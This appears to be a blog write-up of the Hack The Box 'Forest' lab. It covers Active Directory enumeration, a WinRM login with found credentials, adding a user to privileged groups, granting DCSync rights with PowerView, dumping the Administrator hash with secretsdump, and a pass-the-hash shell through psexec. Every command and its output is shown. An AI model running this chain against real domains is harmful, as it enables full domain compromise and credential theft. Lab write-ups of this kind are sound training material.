Nothing really pops off the page right now, but one thing I noticed is that the service account is a part of the Service Accounts group, so I'm going to do a little digging into that group: jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l "Service Accounts" --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "Service Accounts"
[+] Found 2 results:
0: OU=Service Accounts,DC=htb,DC=local
1: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
Which DN do you want to use? : 1
objectClass: top
objectClass: group
cn: Service Accounts
member: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
distinguishedName: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920010308.0Z
whenChanged: 20190923194321.0Z
uSNCreated: 26096
memberOf: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
uSNChanged: 65575
name: Service Accounts
objectGUID: 1Xwoi5KGTEi75wOrN2TQYA==
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPfAQAAA==
adminCount: 1
sAMAccountName: Service Accounts
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 20260306124442.0Z
dSCorePropagationData: 16010101000000.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
And my suspicion was correct. The Service Accounts group is part of another group called Privileged IT Accounts , which allows for remote management access! jbrown@Jabaris-MacBook-Pro windapsearch % ./windapsearch.py -d htb.local --dc-ip 10.129.1.13 -u svc-alfresco -p s3rvice -l "Privileged IT Accounts" --full
[+] Using Domain Controller at: 10.129.1.13
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:HTB\svc-alfresco
[+] Searching for matching DNs for term: "Privileged IT Accounts"
[+] Using DN: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
objectClass: top
objectClass: group
cn: Privileged IT Accounts
member: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
distinguishedName: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
instanceType: 4
whenCreated: 20190920223502.0Z
whenChanged: 20190923194321.0Z
uSNCreated: 28777
memberOf: CN=Account Operators,CN=Builtin,DC=htb,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
uSNChanged: 65574
name: Privileged IT Accounts
objectGUID: Xu6Pvvp5W0uupXkiLK8muQ==
objectSid: AQUAAAAAAAUVAAAALB4ltxV1shXFsPNPfQQAAA==
adminCount: 1
sAMAccountName: Privileged IT Accounts
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 20260306124612.0Z
dSCorePropagationData: 16010101000000.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
Since WinRM is also open on port 5985, we can use evil-winrm to log in with the user credentials we found: jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.1.13 -u svc-alfresco -p s3rvice
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
And just like that, we've successfully grabbed the user flag: *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/6/2026 4:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
***USERFLAGFOUNDHERE***
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Now we're in the post-exploitation phase, so let's look for more information — who we are, what groups we're a part of, and what users and groups exist on the system and in the domain: *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net user
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net group
Group Accounts for \\
-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0> net localgroup
Aliases for \\FOREST
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*System Managed Accounts Group
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop\sharphound-v2.9.0>
If only you knew how long it took me to get BloodHound working. For some reason the executable and PowerShell scripts weren't working after being loaded, so I went with my handy tool NetExec (might be the best tool out there after the complications I just had):
uploading zip file
upload finished!
htb.local
First, let's confirm the computer we're on, which is forest.htb.local . From there we can check what groups we're a part of and what outbound control we have: /opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $env:computername
FOREST
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
We also see another computer on the domain, EXCH01 . It's part of a few groups, and one thing that stands out from the previous screenshots is that the Exchange Windows Permissions group has WriteDACL permissions:
Now if you're like me, I can be a bit forgetful. Luckily I have this mind map provided by Altered Security from the lab training I've done. It gives a good idea of what we can do with permissions like WriteDACL , GenericWrite , and others:
Thanks to altered security this helps me to visualize access
So the computer object has WriteDACL thanks to the group we're in, which means we can grant rights. Now let's enumerate the user we have a bit more:
the user we've compromised
We also see that the account is a member of the Account Operators group through the Privileged IT Accounts group. The Account Operators group has GenericAll permissions over several groups, including Exchange Windows Permissions:
this is a big mistake haha!
This allows us to add ourselves — or another user — to that group. Because Privileged IT Accounts is a member of Account Operators , and Account Operators has GenericAll permissions over the Exchange Windows Permissions group.
So we can create a test user and add them to the appropriate groups, including Remote Management Users , since we want to be able to use the WinRM service: /opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user tester password /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" tester /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" tester /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Now we can upload PowerView and use it to give the new user DCSync rights: *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $pass = convertto-securestring 'password' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $cred = new-object
^C
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> $cred = new-object system.management.automation.pscredential('htb\tester' , $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1> Add-ObjectACL -PrincipalIdentity tester -Credential $cred -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents\PowerView.ps1>
So we should now be able to run a DCSync attack. Since we've elevated our permissions, we can use secretsdump from the Impacket suite to dump the NTLM hashes:
NOTE: Extracts NTLM hashes and Kerberos keys from a Domain Controller or compromised machine with elevated privileges. jbrown@Jabaris-MacBook-Pro examples % secretsdump.py htb/tester:[email protected] -just-dc-user Administrator
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...
jbrown@Jabaris-MacBook-Pro examples %
With this, we can use a well‑known technique called Pass‑the‑Hash , which allows us to authenticate using the NTLM hash instead of the plaintext password. We can use psexec for this:
jbrown@Jabaris-MacBook-Pro examples % python3 psexec.py [email protected] cmd.exe -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.1.13.....
[*] Found writable share ADMIN$
[*] Uploading file HlaQrAGw.exe
[*] Opening SVCManager on 10.129.1.13.....
[*] Creating service SCvD on 10.129.1.13.....
[*] Starting service SCvD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator
09/18/2019 09:09 AM .
09/18/2019 09:09 AM ..
09/20/2019 03:04 PM Contacts
09/23/2019 01:15 PM Desktop
09/23/2019 02:46 PM Documents
09/20/2019 03:04 PM Downloads
09/20/2019 03:04 PM Favorites
09/20/2019 03:04 PM Links
09/20/2019 03:04 PM Music
09/20/2019 03:04 PM Pictures
09/20/2019 03:04 PM Saved Games
09/20/2019 03:04 PM Searches
09/20/2019 03:04 PM Videos
0 File(s) 0 bytes
13 Dir(s) 10,300,977,152 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 01:15 PM .
09/23/2019 01:15 PM ..
03/06/2026 04:04 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,300,977,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
***Root Flag found here***
C:\Users\Administrator\Desktop>
And just like that, we've reached the end of this machine.
Starting from simple enumeration, we were able to identify exposed services, leverage an AS-REP roasting opportunity to recover credentials, and pivot our access through group permissions in Active Directory. From there, abusing WriteDACL and delegated privileges allowed us to escalate our control, grant DCSync rights, and ultimately dump the domain hashes.
Once we had the NTLM hash , a quick Pass-the-Hash attack gave us full control — and the root flag was ours.
Another box down. On to the next.
#cybersecurity #bug-bounty #bug-bounty-writeup #red-team #penetration-testing
Reporting a Problem
Sometimes we have problems displaying some Medium posts.
If you have a problem that some images aren't loading - try using VPN. Probably you have problem with
access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).